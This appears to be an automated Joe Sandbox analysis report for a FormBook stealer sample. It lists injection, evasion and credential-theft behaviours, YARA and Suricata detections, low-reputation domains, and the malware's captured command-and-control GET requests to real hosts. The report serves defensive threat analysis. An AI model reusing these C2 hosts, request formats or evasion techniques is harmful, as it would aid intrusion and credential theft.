Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8EhMjL3yNF.exe

Overview

General Information

Sample name:8EhMjL3yNF.exe
Analysis ID:1529811
MD5:adf7951566b1bb643b3fc555987cbddc
SHA1:29d6e8e48400e531e35b129781528dd3f10fc08b
SHA256:84ced43584331241219ef94bb7d214d96f1c5f4fdbc9adc0bb9d5fcd5cb0f27c
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • 8EhMjL3yNF.exe (PID: 8400 cmdline: "C:\Users\user\Desktop\8EhMjL3yNF.exe" MD5: ADF7951566B1BB643B3FC555987CBDDC)
    • svchost.exe (PID: 8580 cmdline: "C:\Users\user\Desktop\8EhMjL3yNF.exe" MD5: B7C999040D80E5BF87886D70D992C51E)
      • SjhnWvlTMw.exe (PID: 6828 cmdline: "C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • choice.exe (PID: 5492 cmdline: "C:\Windows\SysWOW64\choice.exe" MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
          • SjhnWvlTMw.exe (PID: 6156 cmdline: "C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7044 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: 7B12552FD2A5948256B20EC97B708F94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.708578550328.0000000003FE0000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
  • 0x83d2:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ba60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ba60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      Click to see the 9 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2e153:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x16262:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2ef53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17062:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\8EhMjL3yNF.exe", CommandLine: "C:\Users\user\Desktop\8EhMjL3yNF.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\8EhMjL3yNF.exe", ParentImage: C:\Users\user\Desktop\8EhMjL3yNF.exe, ParentProcessId: 8400, ParentProcessName: 8EhMjL3yNF.exe, ProcessCommandLine: "C:\Users\user\Desktop\8EhMjL3yNF.exe", ProcessId: 8580, ProcessName: svchost.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\8EhMjL3yNF.exe", CommandLine: "C:\Users\user\Desktop\8EhMjL3yNF.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\8EhMjL3yNF.exe", ParentImage: C:\Users\user\Desktop\8EhMjL3yNF.exe, ParentProcessId: 8400, ParentProcessName: 8EhMjL3yNF.exe, ProcessCommandLine: "C:\Users\user\Desktop\8EhMjL3yNF.exe", ProcessId: 8580, ProcessName: svchost.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-09T13:02:39.509624+020020507451Malware Command and Control Activity Detected192.168.11.304982085.159.66.9380TCP
          2024-10-09T13:02:52.764900+020020507451Malware Command and Control Activity Detected192.168.11.304982413.248.169.4880TCP
          2024-10-09T13:03:09.672799+020020507451Malware Command and Control Activity Detected192.168.11.3049829103.255.237.23380TCP
          2024-10-09T13:03:22.910634+020020507451Malware Command and Control Activity Detected192.168.11.3049833104.21.77.6980TCP
          2024-10-09T13:03:37.015594+020020507451Malware Command and Control Activity Detected192.168.11.304983765.21.196.9080TCP
          2024-10-09T13:03:51.267544+020020507451Malware Command and Control Activity Detected192.168.11.30498413.33.130.19080TCP
          2024-10-09T13:04:04.522902+020020507451Malware Command and Control Activity Detected192.168.11.30498453.33.130.19080TCP
          2024-10-09T13:04:17.750385+020020507451Malware Command and Control Activity Detected192.168.11.3049849199.59.243.22780TCP
          2024-10-09T13:04:31.285707+020020507451Malware Command and Control Activity Detected192.168.11.304985345.56.219.23880TCP
          2024-10-09T13:04:44.910690+020020507451Malware Command and Control Activity Detected192.168.11.3049857162.0.238.4380TCP
          2024-10-09T13:04:58.271235+020020507451Malware Command and Control Activity Detected192.168.11.304986123.227.38.7480TCP
          2024-10-09T13:05:11.747519+020020507451Malware Command and Control Activity Detected192.168.11.304986584.32.84.3280TCP
          2024-10-09T13:05:25.377801+020020507451Malware Command and Control Activity Detected192.168.11.304986954.67.42.14580TCP
          2024-10-09T13:05:45.583958+020020507451Malware Command and Control Activity Detected192.168.11.30498733.33.130.19080TCP
          2024-10-09T13:05:59.785367+020020507451Malware Command and Control Activity Detected192.168.11.304987781.2.196.1980TCP
          2024-10-09T13:06:13.274403+020020507451Malware Command and Control Activity Detected192.168.11.304988184.32.84.3280TCP
          2024-10-09T13:07:21.807766+020020507451Malware Command and Control Activity Detected192.168.11.304988285.159.66.9380TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: 8EhMjL3yNF.exeAvira: detected
          Multi AV Scanner detection for submitted file
          Source: 8EhMjL3yNF.exeReversingLabs: Detection: 57%
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.708579283397.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.705376707747.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.708579534751.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Machine Learning detection for sample
          Source: 8EhMjL3yNF.exeJoe Sandbox ML: detected
          Source: 8EhMjL3yNF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: choice.pdbGCTL source: svchost.exe, 00000002.00000003.705345811797.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705345727655.000000000301A000.00000004.00000020.00020000.00000000.sdmp, SjhnWvlTMw.exe, 00000004.00000003.707411095047.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SjhnWvlTMw.exe, 00000004.00000002.708576351890.0000000000D1E000.00000002.00000001.01000000.00000004.sdmp, SjhnWvlTMw.exe, 00000006.00000000.705443693958.0000000000D1E000.00000002.00000001.01000000.00000004.sdmp
          Source: Binary string: wntdll.pdbUGP source: 8EhMjL3yNF.exe, 00000000.00000003.703520236870.0000000004800000.00000004.00001000.00020000.00000000.sdmp, 8EhMjL3yNF.exe, 00000000.00000003.703518152149.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.705378005011.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705288151288.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.705378005011.000000000372D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705284845460.0000000003200000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000005.00000002.708579944136.0000000004F70000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000005.00000002.708579944136.000000000509D000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000005.00000003.705377011026.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000005.00000003.705380810389.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 8EhMjL3yNF.exe, 00000000.00000003.703520236870.0000000004800000.00000004.00001000.00020000.00000000.sdmp, 8EhMjL3yNF.exe, 00000000.00000003.703518152149.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.705378005011.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705288151288.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.705378005011.000000000372D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705284845460.0000000003200000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000005.00000002.708579944136.0000000004F70000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000005.00000002.708579944136.000000000509D000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000005.00000003.705377011026.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000005.00000003.705380810389.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: choice.exe, 00000005.00000002.708581961090.00000000055DC000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000005.00000002.708575105258.0000000003155000.00000004.00000020.00020000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.0000000002FBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.705676368924.000000003C50C000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: choice.exe, 00000005.00000002.708581961090.00000000055DC000.00000004.10000000.00040000.00000000.sdmp, choice.exe, 00000005.00000002.708575105258.0000000003155000.00000004.00000020.00020000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.0000000002FBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.705676368924.000000003C50C000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: choice.pdb source: svchost.exe, 00000002.00000003.705345811797.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.705345727655.000000000301A000.00000004.00000020.00020000.00000000.sdmp, SjhnWvlTMw.exe, 00000004.00000003.707411095047.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_004788BD
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0044BD27 FindFirstFileW,CopyFileW,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0044BF8B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49820 -> 85.159.66.93:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49833 -> 104.21.77.69:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49829 -> 103.255.237.233:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49869 -> 54.67.42.145:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49853 -> 45.56.219.238:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49873 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49837 -> 65.21.196.90:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49845 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49881 -> 84.32.84.32:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49861 -> 23.227.38.74:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49849 -> 199.59.243.227:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49857 -> 162.0.238.43:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49824 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49877 -> 81.2.196.19:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49841 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49882 -> 85.159.66.93:80
          Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49865 -> 84.32.84.32:80
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.sealofsea.xyz
          Source: DNS query: www.languyenthuyduyen.xyz
          Source: DNS query: www.languyenthuyduyen.xyz
          Source: DNS query: www.languyenthuyduyen.xyz
          Source: DNS query: www.030002304.xyz
          Source: DNS query: www.allpop.xyz
          Source: Joe Sandbox ViewIP Address: 162.0.238.43 162.0.238.43
          Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
          Source: Joe Sandbox ViewASN Name: CP-ASDE CP-ASDE
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
          Source: global trafficHTTP traffic detected: GET /a54a/?9X=EvKH2xeP-DpP307P&nhl=o4K6tsf3571BBp7MmhSZOYJB40PnENiiTojsdIYY6SFl2KjLaqenA37xSw6A2T1U0IJTLvgGXRIo0JyFUWzQew80cVlMmXXQBLtF+x/K+99dL6NKNKQQtqY= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.sealofsea.xyzConnection: closeUser-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
          Source: global trafficHTTP traffic detected: GET /2mvq/?nhl=1f2PLfbNsy8M3I94WxoJl+9LYulGMAhL6bYQCSgue7sU5iqO1AF0cOPb0dC3I0oleuEStANR5nkVNI8wgo80xQsJJPMBV5KAM01zlXNY2uMRUF4H75UghTg=&9X=EvKH2xeP-DpP307P HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.firstcry.shopConnection: closeUser-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
          Source: global trafficHTTP traffic detected: GET /zxna/?9X=EvKH2xeP-DpP307P&nhl=T4KZNGow8hyHZ/2VdCpkOUvznzx121WAOLhD3akGih7YK2UBiYRo2lJdrH1gL64cuqcjDePyZUHX/QJDU8k+qCwrYmvEQGfXWN0kwHy8MBDYStPNdJHxaZ4= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.languyenthuyduyen.xyzConnection: closeUser-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
          Source: global trafficHTTP traffic detected: GET /x7ji/?nhl=VbX4XoU1axPwTLIf98pUGPIzQL60g31CACrHzmj3o8Yh1t/lPrcBk6uAM4jdHwr2Bp5gqY7NYKc3aa2dAjtLrrS76KgS6f/xOF9OiJ7sHgK1x6zEV9Cyr40=&9X=EvKH2xeP-DpP307P HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.bayarcepat19.clickConnection: closeUser-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
          Source: global trafficHTTP traffic detected: GET /f06i/?9X=EvKH2xeP-DpP307P&nhl=g1MS1+fiN19fuwYlcBKOU4UzmmsLW0eBYO/90R9nimGtqEGAgI0kE5yyF7WRrE+n+De2SPMKz1ZHlS6i60EYe6+HnhjgGN2ua7X3RkxuKgzxjrOTLKTNX9U= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.030002304.xyzConnection: closeUser-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
          Source: global trafficHTTP traffic detected: GET /0r1y/?nhl=tIIzfNHYepvUcRk9trWFbq+Vuj9A/9CkRl+P/BNExRvW72uzdJWKh6aY9ntqwJ0nOl4wOlHuQy62kEbE4ANiAO3fzo3wUkeE47Ek0wt7hGUXEVOfdvkMJcQ=&9X=EvKH2xeP-DpP307P HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.doggieradio.netConnection: closeUser-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
          Source: global trafficHTTP traffic detected: GET /sfkd/?9X=EvKH2xeP-DpP307P&nhl=6fNbEIWWB2JJYS/xey3WpvKJAvyVMhdKAAm+d4mFCTcNv85JxXzT3vI5ksH8d7X+fFM95ZwnL4Rg7OKzcd6ey2l8BalYo4zWdRdc8Csjk88M/vg6xuj19U8= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.mybartendinglife.clubConnection: closeUser-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
          Source: global trafficHTTP traffic detected: GET /udtr/?nhl=JWRCMib9Ab6yKGK9tVnY1k7oTlzf3FlCZv+JaD8ekJd2eSGus8uX9j1aomNbYcA4VfgdKRJwSCfsWTeuLYlP9NwC5xq+bIEo1S2z3eaxb1ZDoYcdhdFludY=&9X=EvKH2xeP-DpP307P HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.ntn.solarConnection: closeUser-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
          Source: global trafficHTTP traffic detected: GET /n2yx/?9X=EvKH2xeP-DpP307P&nhl=iVeOj9H/jw8/ZkXx4eLZhuHPSRtHACVus0wk2djKTDBvc5j/YX614YP79ezpmvAo29KgRB3gLhtmSCFZBXQ4/utJh3JZlsU8+sR9ZpZpYA5vc3CvDS3ciOs= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.technew.shopConnection: closeUser-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
          Source: global trafficHTTP traffic detected: GET /w6me/?nhl=ZQVtGrOiyfGmX0Bj7aOLb6McZZRaKXEecgRoMf1rX1qYBYk54P5+D+BVBTSMCHRrFOCnGQPC2mKGS9yi7bLDo6yarw5+jQ0DwziRuqiIpXFZxXsIN5XtUDU=&9X=EvKH2xeP-DpP307P HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.allpop.xyzConnection: closeUser-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
          Source: global trafficHTTP traffic detected: GET /c0mi/?9X=EvKH2xeP-DpP307P&nhl=/qBPJVDnAuMkCGTP/HS85thBhnm7sJojL9dSRPkeMTtigtz0zshBu+rciWkGPxuF6vbDEUTteEoy5hWhe9VJGILzyD9w1h6pHrUb6h3XoF15PEDkBz8gt0Y= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.zingara.lifeConnection: closeUser-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
          Source: global trafficHTTP traffic detected: GET /1jig/?nhl=Pctx1PqJ8MApDnItio/Z+EFnrX0P+O6aDAf1ocJJBNfVobZUkvZZH3rRaqwxixVCcZIN7U7Xpqfz9fbsrPgf8JYUk12Pjtd3LjDyQQ9aa4jR42mhfhGkGD0=&9X=EvKH2xeP-DpP307P HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.thepeatear.onlineConnection: closeUser-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
          Source: global trafficHTTP traffic detected: GET /7cee/?nhl=LO11cYuPDN+V6ulgbSQlbQhpKz952Uhe3dYdUk54a5ewrOC/uvvn5bRLfbUUmCEUWVML7qGOWOxZJM3qSQiiVpBT5y4/s1qW1sM6t7L30BdH3o50b80t3Z0=&9X=EvKH2xeP-DpP307P HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.kx507981.shopConnection: closeUser-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
